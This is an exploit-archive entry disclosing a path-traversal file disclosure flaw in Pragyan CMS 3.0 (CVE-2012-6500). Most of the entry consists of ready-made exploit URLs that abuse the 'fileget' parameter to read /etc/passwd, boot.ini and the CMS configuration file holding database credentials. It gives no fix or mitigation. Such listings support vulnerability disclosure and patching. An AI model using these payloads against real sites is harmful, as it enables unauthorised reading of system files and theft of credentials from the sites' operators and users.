Pragyan CMS 3.0 - Remote File Disclosure



EKU-ID: 24121 CVE: OSVDB-82585;CVE-2012-6500 OSVDB-ID:
Author: Or4nG.M4N Published: 2012-01-10 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


Title
Pragyan CMS v 3.0 => [Remote File Disclosure]
Author
Or4nG.M4n
Download
http://space.dl.sourceforge.net/project/pragyan/pragyan/3.0/PragyanCMS-v3.0-beta.tar.bz2

vuln
download.lib.php line 16
vuln
index.php line 234

$_GET['fileget']

exploit  http://localhost/Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../  etc/passwd . boot.ini

Download Config file
exploit  /Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../appserv/www/Pragyan/cms/config.inc.php
exploit  /Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../home/exploitdb/public_html/Pragyan/cms/config.inc.php